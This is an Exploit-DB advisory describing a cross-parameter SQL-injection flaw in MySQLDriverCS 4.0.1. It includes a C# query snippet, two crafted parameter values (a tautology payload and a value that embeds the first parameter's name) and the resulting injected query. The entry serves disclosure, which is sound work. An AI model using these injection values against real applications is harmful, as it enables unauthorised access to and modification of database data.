MySQLDriverCS 4.0.1 SQL Injection Vulnerability

ID EDB-ID:35892
Type exploitdb
Reporter Qihan Luo
Modified 2011-06-27T00:00:00


MySQLDriverCS 4.0.1 SQL Injection Vulnerability. Remote exploits for multiple platform


MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

MySQLDriverCS 4.0.1 is vulnerable; other versions may also be affected.

There is an example for illustrating the attack against the vulnerability:
DataTable dt = new DataTable();
MySQLConnection conn = new MySQLConnection(CONN_STRING);
MySQLDataAdapter Cmd = new MySQLDataAdapter();
string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;

Assigning (one parameter is assigned with SQL injection attack vector, while another one is assigned with a string which contains the parameter name of the first.):
@sFileName: " or 1=1 -- -"
@sLanguage: "cn@sFileName"

Then, the final sql query statement executed by Mysql is as following:
SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
Of course, we should use two parameters to launch a cross-parameter SQL injection attack.